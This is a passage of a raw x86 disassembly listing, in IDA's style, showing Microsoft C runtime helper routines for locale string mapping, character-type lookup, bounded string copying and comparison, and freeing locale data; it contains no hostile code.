loc_40C4E6: ; CODE XREF: sub_40C307+198j
; sub_40C307+1A4j
xor esi, esi
loc_40C4E8: ; CODE XREF: sub_40C307+1C5j
; sub_40C307+1DDj
cmp esi, ebx
jz short loc_40C52D
push [ebp+var_8]
push esi
push edi
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D128 ; LCMapStringW
test eax, eax
jz short loc_40C526
cmp [ebp+arg_14], ebx
push ebx
push ebx
jnz short loc_40C50F
push ebx
push ebx
jmp short loc_40C515
; ---------------------------------------------------------------------------
loc_40C50F: ; CODE XREF: sub_40C307+202j
push [ebp+arg_14]
push [ebp+arg_10]
loc_40C515: ; CODE XREF: sub_40C307+206j
push [ebp+var_8]
push esi
push ebx
push [ebp+arg_18]
call ds:dword_41D134 ; WideCharToMultiByte
mov [ebp+var_8], eax
loc_40C526: ; CODE XREF: sub_40C307+1FBj
push esi
call sub_40C2EC
pop ecx
loc_40C52D: ; CODE XREF: sub_40C307+13Ej
; sub_40C307+15Fj ...
push [ebp+var_C]
call sub_40C2EC
mov eax, [ebp+var_8]
pop ecx
jmp loc_40C697
; ---------------------------------------------------------------------------
loc_40C53E: ; CODE XREF: sub_40C307+86j
; sub_40C307+8Ej
cmp [ebp+arg_0], ebx
mov [ebp+var_C], ebx
mov [ebp+var_10], ebx
jnz short loc_40C551
mov eax, [esi]
mov eax, [eax+14h]
mov [ebp+arg_0], eax
loc_40C551: ; CODE XREF: sub_40C307+240j
cmp [ebp+arg_18], ebx
jnz short loc_40C55E
mov eax, [esi]
mov eax, [eax+4]
mov [ebp+arg_18], eax
loc_40C55E: ; CODE XREF: sub_40C307+24Dj
push [ebp+arg_0]
call sub_410661
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+var_14], eax
jnz short loc_40C576
loc_40C56F: ; CODE XREF: sub_40C307+97j
; sub_40C307+D4j ...
xor eax, eax
jmp loc_40C697
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40C307+266j
cmp eax, [ebp+arg_18]
jz loc_40C65A
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_4106A8
add esp, 18h
cmp eax, ebx
mov [ebp+var_C], eax
jz short loc_40C56F
mov esi, ds:off_41D12C
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; sub_446F56
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C5BD
loc_40C5B6: ; CODE XREF: sub_40C307+2D0j
; sub_40C307+2F9j
xor esi, esi
jmp loc_40C674
; ---------------------------------------------------------------------------
loc_40C5BD: ; CODE XREF: sub_40C307+2ADj
jle short loc_40C5FC
cmp eax, 0FFFFFFE0h
ja short loc_40C5FC
add eax, 8
cmp eax, 400h
ja short loc_40C5E4
call sub_410860
mov edi, esp
cmp edi, ebx
jz short loc_40C5B6
mov dword ptr [edi], 0CCCCh
add edi, 8
jmp short loc_40C5FE
; ---------------------------------------------------------------------------
loc_40C5E4: ; CODE XREF: sub_40C307+2C5j
push eax
call sub_403AAC
cmp eax, ebx
pop ecx
jz short loc_40C5F8
mov dword ptr [eax], 0DDDDh
add eax, 8
loc_40C5F8: ; CODE XREF: sub_40C307+2E6j
mov edi, eax
jmp short loc_40C5FE
; ---------------------------------------------------------------------------
loc_40C5FC: ; CODE XREF: sub_40C307:loc_40C5BDj
; sub_40C307+2BBj
xor edi, edi
loc_40C5FE: ; CODE XREF: sub_40C307+2DBj
; sub_40C307+2F3j
cmp edi, ebx
jz short loc_40C5B6
push [ebp+var_8]
push ebx
push edi
call sub_407F20
add esp, 0Ch
push [ebp+var_8]
push edi
push [ebp+arg_C]
push [ebp+var_C]
push [ebp+arg_4]
push [ebp+arg_0]
call esi ; sub_446F56
cmp eax, ebx
mov [ebp+var_8], eax
jnz short loc_40C62C
xor esi, esi
jmp short loc_40C651
; ---------------------------------------------------------------------------
loc_40C62C: ; CODE XREF: sub_40C307+31Fj
push [ebp+arg_14]
lea eax, [ebp+var_8]
push [ebp+arg_10]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_14]
call sub_4106A8
mov esi, eax
mov [ebp+var_10], esi
add esp, 18h
neg esi
sbb esi, esi
and esi, [ebp+var_8]
loc_40C651: ; CODE XREF: sub_40C307+323j
push edi
call sub_40C2EC
pop ecx
jmp short loc_40C674
; ---------------------------------------------------------------------------
loc_40C65A: ; CODE XREF: sub_40C307+272j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:off_41D12C
mov esi, eax
loc_40C674: ; CODE XREF: sub_40C307+2B1j
; sub_40C307+351j
cmp [ebp+var_C], ebx
jz short loc_40C682
push [ebp+var_C]
call sub_4039CF
pop ecx
loc_40C682: ; CODE XREF: sub_40C307+370j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_40C695
cmp [ebp+arg_10], eax
jz short loc_40C695
push eax
call sub_4039CF
pop ecx
loc_40C695: ; CODE XREF: sub_40C307+380j
; sub_40C307+385j
mov eax, esi
loc_40C697: ; CODE XREF: sub_40C307+232j
; sub_40C307+26Aj
lea esp, [ebp-20h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402ADC
leave
retn
sub_40C307 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C6A9 proc near ; CODE XREF: sub_404BC6+B6p
; sub_404BC6+DBp ...
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_402AEB
push [ebp+arg_20]
lea ecx, [ebp+var_10]
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C307
add esp, 20h
cmp [ebp+var_4], 0
jz short locret_40C6EA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C6EA: ; CODE XREF: sub_40C6A9+38j
leave
retn
sub_40C6A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C6EC proc near ; CODE XREF: sub_40C8A4+29p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, dword_427F74
push ebx
push esi
xor ebx, ebx
cmp eax, ebx
push edi
mov edi, ecx
jnz short loc_40C745
lea eax, [ebp+var_8]
push eax
xor esi, esi
inc esi
push esi
push offset dword_41DC4C
push esi
call ds:dword_41D120 ; GetStringTypeW
test eax, eax
jz short loc_40C72B
mov dword_427F74, esi
jmp short loc_40C75F
; ---------------------------------------------------------------------------
loc_40C72B: ; CODE XREF: sub_40C6EC+35j
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_40C740
push 2
pop eax
mov dword_427F74, eax
jmp short loc_40C745
; ---------------------------------------------------------------------------
loc_40C740: ; CODE XREF: sub_40C6EC+48j
mov eax, dword_427F74
loc_40C745: ; CODE XREF: sub_40C6EC+1Dj
; sub_40C6EC+52j
cmp eax, 2
jz loc_40C81D
cmp eax, ebx
jz loc_40C81D
cmp eax, 1
jnz loc_40C847
loc_40C75F: ; CODE XREF: sub_40C6EC+3Dj
cmp [ebp+arg_10], ebx
mov [ebp+var_8], ebx
jnz short loc_40C76F
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C76F: ; CODE XREF: sub_40C6EC+79j
mov esi, ds:dword_41D0A0
xor eax, eax
cmp [ebp+arg_18], ebx
push ebx
push ebx
push [ebp+arg_8]
setnz al
push [ebp+arg_4]
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_10]
call esi ; MultiByteToWideChar
mov edi, eax
cmp edi, ebx
jz loc_40C847
jle short loc_40C7DA
cmp edi, 7FFFFFF0h
ja short loc_40C7DA
lea eax, [edi+edi+8]
cmp eax, 400h
ja short loc_40C7C4
call sub_410860
mov eax, esp
cmp eax, ebx
jz short loc_40C7D8
mov dword ptr [eax], 0CCCCh
jmp short loc_40C7D5
; ---------------------------------------------------------------------------
loc_40C7C4: ; CODE XREF: sub_40C6EC+C3j
push eax
call sub_403AAC
cmp eax, ebx
pop ecx
jz short loc_40C7D8
mov dword ptr [eax], 0DDDDh
loc_40C7D5: ; CODE XREF: sub_40C6EC+D6j
add eax, 8
loc_40C7D8: ; CODE XREF: sub_40C6EC+CEj
; sub_40C6EC+E1j
mov ebx, eax
loc_40C7DA: ; CODE XREF: sub_40C6EC+B0j
; sub_40C6EC+B8j
test ebx, ebx
jz short loc_40C847
lea eax, [edi+edi]
push eax
push 0
push ebx
call sub_407F20
add esp, 0Ch
push edi
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_40C811
push [ebp+arg_C]
push eax
push ebx
push [ebp+arg_0]
call ds:dword_41D120 ; GetStringTypeW
mov [ebp+var_8], eax
loc_40C811: ; CODE XREF: sub_40C6EC+112j
push ebx
call sub_40C2EC
mov eax, [ebp+var_8]
pop ecx
jmp short loc_40C892
; ---------------------------------------------------------------------------
loc_40C81D: ; CODE XREF: sub_40C6EC+5Cj
; sub_40C6EC+64j
xor esi, esi
cmp [ebp+arg_14], ebx
jnz short loc_40C82C
mov eax, [edi]
mov eax, [eax+14h]
mov [ebp+arg_14], eax
loc_40C82C: ; CODE XREF: sub_40C6EC+136j
cmp [ebp+arg_10], ebx
jnz short loc_40C839
mov eax, [edi]
mov eax, [eax+4]
mov [ebp+arg_10], eax
loc_40C839: ; CODE XREF: sub_40C6EC+143j
push [ebp+arg_14]
call sub_410661
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C84B
loc_40C847: ; CODE XREF: sub_40C6EC+6Dj
; sub_40C6EC+AAj ...
xor eax, eax
jmp short loc_40C892
; ---------------------------------------------------------------------------
loc_40C84B: ; CODE XREF: sub_40C6EC+159j
cmp eax, [ebp+arg_10]
jz short loc_40C86E
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ecx
push [ebp+arg_4]
push eax
push [ebp+arg_10]
call sub_4106A8
mov esi, eax
add esp, 18h
cmp esi, ebx
jz short loc_40C847
mov [ebp+arg_4], esi
loc_40C86E: ; CODE XREF: sub_40C6EC+162j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push [ebp+arg_14]
call ds:off_41D124
cmp esi, ebx
mov edi, eax
jz short loc_40C890
push esi
call sub_4039CF
pop ecx
loc_40C890: ; CODE XREF: sub_40C6EC+19Bj
mov eax, edi
loc_40C892: ; CODE XREF: sub_40C6EC+12Fj
; sub_40C6EC+15Dj
lea esp, [ebp-14h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_402ADC
leave
retn
sub_40C6EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8A4 proc near ; CODE XREF: sub_404BC6+96p
; sub_40CDF4+83p
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_0]
lea ecx, [ebp+var_10]
call sub_402AEB
push [ebp+arg_1C]
lea ecx, [ebp+var_10]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40C6EC
add esp, 1Ch
cmp [ebp+var_4], 0
jz short locret_40C8E2
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40C8E2: ; CODE XREF: sub_40C8A4+35j
leave
retn
sub_40C8A4 endp
; =============== S U B R O U T I N E =======================================
sub_40C8E4 proc near ; CODE XREF: sub_4051D1+E9p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz loc_40CA72
push dword ptr [esi+4]
call sub_4039CF
push dword ptr [esi+8]
call sub_4039CF
push dword ptr [esi+0Ch]
call sub_4039CF
push dword ptr [esi+10h]
call sub_4039CF
push dword ptr [esi+14h]
call sub_4039CF
push dword ptr [esi+18h]
call sub_4039CF
push dword ptr [esi]
call sub_4039CF
push dword ptr [esi+20h]
call sub_4039CF
push dword ptr [esi+24h]
call sub_4039CF
push dword ptr [esi+28h]
call sub_4039CF
push dword ptr [esi+2Ch]
call sub_4039CF
push dword ptr [esi+30h]
call sub_4039CF
push dword ptr [esi+34h]
call sub_4039CF
push dword ptr [esi+1Ch]
call sub_4039CF
push dword ptr [esi+38h]
call sub_4039CF
push dword ptr [esi+3Ch]
call sub_4039CF
add esp, 40h
push dword ptr [esi+40h]
call sub_4039CF
push dword ptr [esi+44h]
call sub_4039CF
push dword ptr [esi+48h]
call sub_4039CF
push dword ptr [esi+4Ch]
call sub_4039CF
push dword ptr [esi+50h]
call sub_4039CF
push dword ptr [esi+54h]
call sub_4039CF
push dword ptr [esi+58h]
call sub_4039CF
push dword ptr [esi+5Ch]
call sub_4039CF
push dword ptr [esi+60h]
call sub_4039CF
push dword ptr [esi+64h]
call sub_4039CF
push dword ptr [esi+68h]
call sub_4039CF
push dword ptr [esi+6Ch]
call sub_4039CF
push dword ptr [esi+70h]
call sub_4039CF
push dword ptr [esi+74h]
call sub_4039CF
push dword ptr [esi+78h]
call sub_4039CF
push dword ptr [esi+7Ch]
call sub_4039CF
add esp, 40h
push dword ptr [esi+80h]
call sub_4039CF
push dword ptr [esi+84h]
call sub_4039CF
push dword ptr [esi+88h]
call sub_4039CF
push dword ptr [esi+8Ch]
call sub_4039CF
push dword ptr [esi+90h]
call sub_4039CF
push dword ptr [esi+94h]
call sub_4039CF
push dword ptr [esi+98h]
call sub_4039CF
push dword ptr [esi+9Ch]
call sub_4039CF
push dword ptr [esi+0A0h]
call sub_4039CF
push dword ptr [esi+0A4h]
call sub_4039CF
push dword ptr [esi+0A8h]
call sub_4039CF
add esp, 2Ch
loc_40CA72: ; CODE XREF: sub_40C8E4+7j
pop esi
retn
sub_40C8E4 endp
; =============== S U B R O U T I N E =======================================
sub_40CA74 proc near ; CODE XREF: sub_4051D1+64p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40CAB2
mov eax, [esi]
cmp eax, off_423F38
jz short loc_40CA8E
push eax
call sub_4039CF
pop ecx
loc_40CA8E: ; CODE XREF: sub_40CA74+11j
mov eax, [esi+4]
cmp eax, off_423F3C
jz short loc_40CAA0
push eax
call sub_4039CF
pop ecx
loc_40CAA0: ; CODE XREF: sub_40CA74+23j
mov esi, [esi+8]
cmp esi, off_423F40
jz short loc_40CAB2
push esi
call sub_4039CF
pop ecx
loc_40CAB2: ; CODE XREF: sub_40CA74+7j
; sub_40CA74+35j
pop esi
retn
sub_40CA74 endp
; =============== S U B R O U T I N E =======================================
sub_40CAB4 proc near ; CODE XREF: sub_4051D1+43p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40CB3B
mov eax, [esi+0Ch]
cmp eax, off_423F44
jz short loc_40CACF
push eax
call sub_4039CF
pop ecx
loc_40CACF: ; CODE XREF: sub_40CAB4+12j
mov eax, [esi+10h]
cmp eax, off_423F48
jz short loc_40CAE1
push eax
call sub_4039CF
pop ecx
loc_40CAE1: ; CODE XREF: sub_40CAB4+24j
mov eax, [esi+14h]
cmp eax, off_423F4C
jz short loc_40CAF3
push eax
call sub_4039CF
pop ecx
loc_40CAF3: ; CODE XREF: sub_40CAB4+36j
mov eax, [esi+18h]
cmp eax, off_423F50
jz short loc_40CB05
push eax
call sub_4039CF
pop ecx
loc_40CB05: ; CODE XREF: sub_40CAB4+48j
mov eax, [esi+1Ch]
cmp eax, off_423F54
jz short loc_40CB17
push eax
call sub_4039CF
pop ecx
loc_40CB17: ; CODE XREF: sub_40CAB4+5Aj
mov eax, [esi+20h]
cmp eax, off_423F58
jz short loc_40CB29
push eax
call sub_4039CF
pop ecx
loc_40CB29: ; CODE XREF: sub_40CAB4+6Cj
mov esi, [esi+24h]
cmp esi, off_423F5C
jz short loc_40CB3B
push esi
call sub_4039CF
pop ecx
loc_40CB3B: ; CODE XREF: sub_40CAB4+7j
; sub_40CAB4+7Ej
pop esi
retn
sub_40CAB4 endp
; =============== S U B R O U T I N E =======================================
sub_40CB3D proc near ; CODE XREF: sub_409E64+117p
; sub_409E64+139p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
xor ebx, ebx
cmp eax, ebx
push esi
push edi
jz short loc_40CB52
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_40CB6D
loc_40CB52: ; CODE XREF: sub_40CB3D+Bj
; sub_40CB3D+3Aj
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_40CB5C: ; CODE XREF: sub_40CB3D+69j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_40CBAA
; ---------------------------------------------------------------------------
loc_40CB6D: ; CODE XREF: sub_40CB3D+13j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_40CB79
loc_40CB75: ; CODE XREF: sub_40CB3D+48j
mov [eax], bl
jmp short loc_40CB52
; ---------------------------------------------------------------------------
loc_40CB79: ; CODE XREF: sub_40CB3D+36j
mov edx, eax
loc_40CB7B: ; CODE XREF: sub_40CB3D+44j
cmp [edx], bl
jz short loc_40CB83
inc edx
dec edi
jnz short loc_40CB7B
loc_40CB83: ; CODE XREF: sub_40CB3D+40j
cmp edi, ebx
jz short loc_40CB75
loc_40CB87: ; CODE XREF: sub_40CB3D+55j
mov cl, [esi]
mov [edx], cl
inc edx
inc esi
cmp cl, bl
jz short loc_40CB94
dec edi
jnz short loc_40CB87
loc_40CB94: ; CODE XREF: sub_40CB3D+52j
cmp edi, ebx
jnz short loc_40CBA8
mov [eax], bl
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40CB5C
; ---------------------------------------------------------------------------
loc_40CBA8: ; CODE XREF: sub_40CB3D+59j
xor eax, eax
loc_40CBAA: ; CODE XREF: sub_40CB3D+2Ej
pop edi
pop esi
pop ebx
retn
sub_40CB3D endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40CBC4: ; CODE XREF: .text:0040CBD1j
mov al, [edx]
or al, al
jz short loc_40CBD3
add edx, 1
bts [esp], eax
jmp short loc_40CBC4
; ---------------------------------------------------------------------------
loc_40CBD3: ; CODE XREF: .text:0040CBC8j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_40CBDC: ; CODE XREF: .text:0040CBECj
add ecx, 1
mov al, [esi]
or al, al
jz short loc_40CBEE
add esi, 1
bt [esp], eax
jnb short loc_40CBDC
loc_40CBEE: ; CODE XREF: .text:0040CBE3j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CBF6 proc near ; CODE XREF: sub_409E64+F1p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [ebp+arg_C], ebx
push edi
jnz short loc_40CC16
cmp esi, ebx
jnz short loc_40CC1A
cmp [ebp+arg_4], ebx
jnz short loc_40CC21
loc_40CC0F: ; CODE XREF: sub_40CBF6+4Dj
; sub_40CBF6+8Cj
xor eax, eax
loc_40CC11: ; CODE XREF: sub_40CBF6+44j
; sub_40CBF6+9Ej
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40CC16: ; CODE XREF: sub_40CBF6+Ej
cmp esi, ebx
jz short loc_40CC21
loc_40CC1A: ; CODE XREF: sub_40CBF6+12j
mov edi, [ebp+arg_4]
cmp edi, ebx
ja short loc_40CC3C
loc_40CC21: ; CODE XREF: sub_40CBF6+17j
; sub_40CBF6+22j ...
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_40CC2B: ; CODE XREF: sub_40CBF6+B1j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_40CC11
; ---------------------------------------------------------------------------
loc_40CC3C: ; CODE XREF: sub_40CBF6+29j
cmp [ebp+arg_C], ebx
jnz short loc_40CC45
mov [esi], bl
jmp short loc_40CC0F
; ---------------------------------------------------------------------------
loc_40CC45: ; CODE XREF: sub_40CBF6+49j
mov edx, [ebp+arg_8]
cmp edx, ebx
jnz short loc_40CC50
mov [esi], bl
jmp short loc_40CC21
; ---------------------------------------------------------------------------
loc_40CC50: ; CODE XREF: sub_40CBF6+54j
cmp [ebp+arg_C], 0FFFFFFFFh
mov eax, esi
jnz short loc_40CC67
loc_40CC58: ; CODE XREF: sub_40CBF6+6Dj
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40CC80
dec edi
jnz short loc_40CC58
jmp short loc_40CC80
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CBF6+60j
; sub_40CBF6+81j
mov cl, [edx]
mov [eax], cl
inc eax
inc edx
cmp cl, bl
jz short loc_40CC79
dec edi
jz short loc_40CC79
dec [ebp+arg_C]
jnz short loc_40CC67
loc_40CC79: ; CODE XREF: sub_40CBF6+79j
; sub_40CBF6+7Cj
cmp [ebp+arg_C], ebx
jnz short loc_40CC80
mov [eax], bl
loc_40CC80: ; CODE XREF: sub_40CBF6+6Aj
; sub_40CBF6+6Fj ...
cmp edi, ebx
jnz short loc_40CC0F
cmp [ebp+arg_C], 0FFFFFFFFh
jnz short loc_40CC99
mov eax, [ebp+arg_4]
push 50h
mov [esi+eax-1], bl
pop eax
jmp loc_40CC11
; ---------------------------------------------------------------------------
loc_40CC99: ; CODE XREF: sub_40CBF6+92j
mov [esi], bl
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_40CC2B
sub_40CBF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCA9 proc near ; CODE XREF: sub_40ED77+32p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_8]
test ebx, ebx
jnz short loc_40CCC0
xor eax, eax
jmp loc_40CD5A
; ---------------------------------------------------------------------------
loc_40CCC0: ; CODE XREF: sub_40CCA9+Ej
cmp ebx, 4
push edi
jb short loc_40CD3B
lea edi, [ebx-4]
test edi, edi
jbe short loc_40CD3B
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
loc_40CCD3: ; CODE XREF: sub_40CCA9+66j
mov dl, [eax]
add eax, 4
add ecx, 4
test dl, dl
jz short loc_40CD31
cmp dl, [ecx-4]
jnz short loc_40CD31
mov dl, [eax-3]
test dl, dl
jz short loc_40CD27
cmp dl, [ecx-3]
jnz short loc_40CD27
mov dl, [eax-2]
test dl, dl
jz short loc_40CD1D
cmp dl, [ecx-2]
jnz short loc_40CD1D
mov dl, [eax-1]
test dl, dl
jz short loc_40CD13
cmp dl, [ecx-1]
jnz short loc_40CD13
add [ebp+var_4], 4
cmp [ebp+var_4], edi
jb short loc_40CCD3
jmp short loc_40CD52
; ---------------------------------------------------------------------------
loc_40CD13: ; CODE XREF: sub_40CCA9+58j
; sub_40CCA9+5Dj
movzx eax, byte ptr [eax-1]
movzx ecx, byte ptr [ecx-1]
jmp short loc_40CD63
; ---------------------------------------------------------------------------
loc_40CD1D: ; CODE XREF: sub_40CCA9+4Cj
; sub_40CCA9+51j
movzx eax, byte ptr [eax-2]
movzx ecx, byte ptr [ecx-2]
jmp short loc_40CD63
; ---------------------------------------------------------------------------
loc_40CD27: ; CODE XREF: sub_40CCA9+40j
; sub_40CCA9+45j
movzx eax, byte ptr [eax-3]
movzx ecx, byte ptr [ecx-3]
jmp short loc_40CD63
; ---------------------------------------------------------------------------
loc_40CD31: ; CODE XREF: sub_40CCA9+34j
; sub_40CCA9+39j
movzx eax, byte ptr [eax-4]
movzx ecx, byte ptr [ecx-4]
jmp short loc_40CD63
; ---------------------------------------------------------------------------
loc_40CD3B: ; CODE XREF: sub_40CCA9+1Bj
; sub_40CCA9+22j
mov ecx, [ebp+arg_4]
mov eax, [ebp+arg_0]
jmp short loc_40CD52
; ---------------------------------------------------------------------------
loc_40CD43: ; CODE XREF: sub_40CCA9+ACj
mov dl, [eax]
test dl, dl
jz short loc_40CD5D
cmp dl, [ecx]
jnz short loc_40CD5D
inc eax
inc ecx
inc [ebp+var_4]
loc_40CD52: ; CODE XREF: sub_40CCA9+68j
; sub_40CCA9+98j
cmp [ebp+var_4], ebx
jb short loc_40CD43
xor eax, eax
loc_40CD59: ; CODE XREF: sub_40CCA9+BCj
pop edi
loc_40CD5A: ; CODE XREF: sub_40CCA9+12j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40CD5D: ; CODE XREF: sub_40CCA9+9Ej
; sub_40CCA9+A2j
movzx eax, byte ptr [eax]
movzx ecx, byte ptr [ecx]
loc_40CD63: ; CODE XREF: sub_40CCA9+72j
; sub_40CCA9+7Cj ...
sub eax, ecx
jmp short loc_40CD59
sub_40CCA9 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_40CD84: ; CODE XREF: .text:0040CD91j
mov al, [edx]
or al, al
jz short loc_40CD93
add edx, 1
bts [esp], eax
jmp short loc_40CD84
; ---------------------------------------------------------------------------
loc_40CD93: ; CODE XREF: .text:0040CD88j
mov esi, [ebp+8]
mov edi, edi
loc_40CD98: ; CODE XREF: .text:0040CDA5j
mov al, [esi]
or al, al
jz short loc_40CDAA
add esi, 1
bt [esp], eax
jnb short loc_40CD98
lea eax, [esi-1]
loc_40CDAA: ; CODE XREF: .text:0040CD9Cj
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CDB0 proc near ; CODE XREF: sub_405A0A+93p
; sub_406D87+34Dp ...
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_402AEB
movzx eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov ecx, [ecx+0C8h]
movzx eax, word ptr [ecx+eax*2]
and eax, 8000h
cmp [ebp+var_4], 0
jz short locret_40CDE4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40CDE4: ; CODE XREF: sub_40CDB0+2Bj
leave
retn
sub_40CDB0 endp
; =============== S U B R O U T I N E =======================================
sub_40CDE6 proc near ; CODE XREF: sub_409217+6CBp
; sub_409217+B85p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40CDB0
pop ecx
pop ecx
retn
sub_40CDE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CDF4 proc near ; CODE XREF: sub_405A0A+32p
; sub_40A7DB+81p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_18]
call sub_402AEB
mov ebx, [ebp+arg_0]
lea eax, [ebx+1]
cmp eax, 100h
ja short loc_40CE22
mov eax, [ebp+var_18]
mov eax, [eax+0C8h]
movzx eax, word ptr [eax+ebx*2]
jmp short loc_40CE97
; ---------------------------------------------------------------------------
loc_40CE22: ; CODE XREF: sub_40CDF4+1Dj
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CDB0
test eax, eax
pop ecx
pop ecx
jz short loc_40CE53
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_8], al
mov [ebp+var_7], bl
mov [ebp+var_6], 0
pop ecx
